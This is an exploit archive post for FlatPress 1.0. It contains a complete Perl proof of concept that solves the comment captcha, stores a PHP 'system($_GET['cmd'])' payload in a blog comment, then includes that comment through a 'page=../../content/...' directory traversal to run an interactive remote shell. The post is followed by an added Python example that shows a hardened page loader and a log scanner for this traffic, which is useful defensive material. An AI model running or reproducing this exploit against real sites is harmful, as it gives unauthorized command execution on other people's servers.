Flatpress 1.0 Traversal / Command Execution

Posted Nov 6, 2013
Authored by Wireghoul

Flatpress version 1.0 remote code execution exploit. It posts a blog comment containing an inlinePHP [exec] payload, then uses a directory traversal in the static page loader (the page parameter) to include the stored comment file as a page, so the injected PHP runs. Requires the inlinePHP plugin to be enabled on the target.

tags | exploit, remote, code execution
SHA-256 | 8cbb0d3675b2bd21358cd41f0015f77833c3b74c965121dd98e9e879bf4160dc

#!/usr/bin/perl
# Exploit Title: Flatpress remote code execution PoC NULLday
# Google Dork: This site is powered by FlatPress.
# Date: 17/10/2013
# Exploit Author: Wireghoul
# Vendor Homepage: http://flatpress.org/home/
# Software Link: http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0
#
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Requires the inlinePHP plugin to be enabled.
# Written by @Wireghoul - justanotherhacker.com
#
# This is for my peeps and the freaks in the front row -- Hilltop Hoods: Nosebleed section

use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;    # URL-encode whatever is typed at the pseudo-shell prompt

$| = 1;             # flush the prompt before blocking on STDIN

banner();
usage() unless $ARGV[0];
my $injid = 'Spl0ited' . int(rand(9999));   # marker used to find our own comment again
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });

sub banner {
    print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
    print "=======================[ justanotherhacker.com]==\n";
}

sub usage {
    print "Usage: $0 <url>\n";
    exit;
}

# Check that the inlinePHP plugin ships on the target (this proves presence, not that it is enabled)
my $response = $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
    print "[-] Inline PHP plugin not found at $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
    print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}

# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
    if ($response->decoded_content =~ /(http.*?x=entry:entry.*?;comments:1#comments)/) {
        my $cmntlink = $1;
        print "[+] Found comment link: $cmntlink\n";
        # Can't be bothered solving easy captchas, just reload page until we get one we like
        my $aaspam = 0;
        while ($aaspam == 0) {
            $response = $ua->get($cmntlink);
            if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \? \(\*\)/) {
                $aaspam = $1 + $2;
                print "[+] Defeated antispam $1 + $2 = $aaspam\n";
            } else {
                my $question = $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/ ? $1 : 'no question found';
                print "[*] Unknown antispam: $question ... retrying\n";
            }
        }
        # Post a comment carrying the inlinePHP payload. The SHELL...LLEHS markers let us
        # cut the command output out of the rendered page later.
        $response = $ua->post(
            $cmntlink . "form",
            Content => {
                'name'    => $injid,
                'email'   => '',
                'url'     => '',
                'aaspam'  => $aaspam,
                'content' => "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
                'submit'  => 'Add',
            }
        );
        $response = $ua->get($cmntlink);
        # Find link to injected content, then execute pseudo shell in loop
        my @cmnts    = split(/<li id="comment/, $response->decoded_content);
        my @injected = grep { /$injid/ } @cmnts;
        if (@injected
            && $injected[0] =~ m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/) {
            print "[+] Injection ($injid) successful\n";
            # Traversal relative to the static page directory: two levels up, then back into
            # content/YY/MM/entryYYMMDD-HHMMSS/comments/commentYYMMDD-HHMMSS, the stored comment
            my $shell = "$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
            print "[*] Dropping into shell, type exit to exit\n";
            while (1) {
                print '$ ';
                my $line = <STDIN>;
                last unless defined $line;    # EOF on stdin
                chomp $line;
                exit if $line eq 'exit';
                my $output = $ua->get("$shell&cmd=" . uri_escape($line));
                my $clean = $output->decoded_content =~ /SHELL(.*)LLEHS/ms ? $1 : '';
                $clean =~ s/<br \/>//g;
                print "$clean\n";
            }
        } else {
            print "[-] Unable to identify the injection point\n";
        }
    } else {
        print "[-] Comment link not found\n";
    }
} else {
    die $response->status_line;
}
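The PoC above works because the page parameter is joined onto the static page directory without any check that the result stays inside it. The example below is an added illustration, not FlatPress code and not part of Wireghoul's PoC: it models that loader in Python with a vulnerable and a hardened variant, builds a throw-away content tree shaped like the path the exploit traverses (content/static for pages, content/YY/MM/entry.../comments/ for comments; the dates, file names and function names are assumptions), and applies the same containment test to a few constructed web server log lines so the traffic the PoC generates can be spotted after the fact.

```python
"""Path-containment check for a FlatPress-style 'page=' loader, plus a log
scanner that applies the same test to recorded requests.

Added example, not FlatPress or Wireghoul's code. The directory layout, the
names and the log lines are assumptions made for illustration; they follow
the path shape the PoC builds:
  page=../../content/YY/MM/entryYYMMDD-HHMMSS/comments/commentYYMMDD-HHMMSS
"""
import os
import re
import tempfile
from urllib.parse import parse_qs, unquote, urlsplit

# The exploit's traversal target, with made-up entry and comment timestamps.
TRAVERSAL = "../../content/13/10/entry131017-120000/comments/comment131017-120500"

# A static page name is a single path component; anything else is rejected.
PAGE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Constructed access-log lines (not from any real server): one benign page
# load and two requests with the shape of the PoC's traffic, the second one
# URL-encoded.
LOG_LINES = [
    '10.0.0.5 - - [17/Oct/2013:12:05:01 +0000] "GET /flatpress/index.php?page=about HTTP/1.1" 200 1532',
    '10.0.0.9 - - [17/Oct/2013:12:06:44 +0000] "GET /flatpress/index.php?page=../../content/13/10/entry131017-120000/comments/comment131017-120500&cmd=id HTTP/1.1" 200 211',
    '10.0.0.9 - - [17/Oct/2013:12:06:50 +0000] "GET /flatpress/index.php?page=..%2F..%2Fcontent%2F13%2F10%2Fentry131017-120000%2Fcomments%2Fcomment131017-120500&cmd=uname%20-a HTTP/1.1" 200 245',
]
REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def make_site(root):
    """Build a tree mimicking the layout the PoC traverses and return the
    static page directory. The comment file holds the PoC's payload."""
    static = os.path.join(root, "content", "static")
    comments = os.path.join(root, "content", "13", "10",
                            "entry131017-120000", "comments")
    os.makedirs(static)
    os.makedirs(comments)
    with open(os.path.join(static, "about.txt"), "w") as f:
        f.write("About this blog\n")
    with open(os.path.join(comments, "comment131017-120500.txt"), "w") as f:
        f.write("SHELL[exec]system($_GET['cmd']);[/exec]LLEHS\n")
    return static


def load_page_unsafe(static_dir, page):
    """Vulnerable pattern: the request parameter is concatenated into the
    path, so '../' sequences walk out of the static directory."""
    with open(os.path.join(static_dir, page + ".txt")) as f:
        return f.read()


def is_contained(static_dir, page):
    """True only if static_dir/page.txt still resolves inside static_dir
    after symlinks and '..' components are resolved."""
    base = os.path.realpath(static_dir)
    target = os.path.realpath(os.path.join(base, page + ".txt"))
    return os.path.commonpath([base, target]) == base


def load_page_safe(static_dir, page):
    """Hardened loader: whitelist the page name, then confirm the resolved
    path is under the static directory before opening it."""
    if not PAGE_NAME.match(page):
        raise ValueError("bad page name: %r" % page)
    if not is_contained(static_dir, page):
        raise ValueError("page escapes static dir: %r" % page)
    with open(os.path.join(static_dir, page + ".txt")) as f:
        return f.read()


def flag_requests(lines):
    """Return (client, page, cmd) for each request whose page parameter
    fails the whitelist. parse_qs already decodes %2F; the extra unquote
    also catches double-encoded traversal sequences."""
    hits = []
    for line in lines:
        m = REQ.search(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group(1)).query)
        page = unquote(qs.get("page", [""])[0])
        if page and not PAGE_NAME.match(page):
            hits.append((line.split()[0], page, qs.get("cmd", [None])[0]))
    return hits


def demo():
    """Run both loaders against the PoC's traversal string in a temp tree."""
    with tempfile.TemporaryDirectory() as root:
        static = make_site(root)
        leaked = load_page_unsafe(static, TRAVERSAL)   # reads the comment file
        try:
            load_page_safe(static, TRAVERSAL)
            blocked = False
        except ValueError:
            blocked = True
        return {
            "leaked": leaked,
            "blocked": blocked,
            "about": load_page_safe(static, "about"),
            "contained_about": is_contained(static, "about"),
            "contained_traversal": is_contained(static, TRAVERSAL),
        }


if __name__ == "__main__":
    result = demo()
    print("unsafe loader returned:", result["leaked"].strip())
    print("safe loader blocked traversal:", result["blocked"])
    for client, page, cmd in flag_requests(LOG_LINES):
        print("suspicious request from %s page=%s cmd=%s" % (client, page, cmd))
```

The whitelist alone would stop this PoC; the realpath/commonpath check is kept as a second layer so a later change to the allowed characters cannot silently reopen the traversal. The log scanner flags on the page parameter rather than on cmd, since the attacker chooses the latter name and can rename it freely.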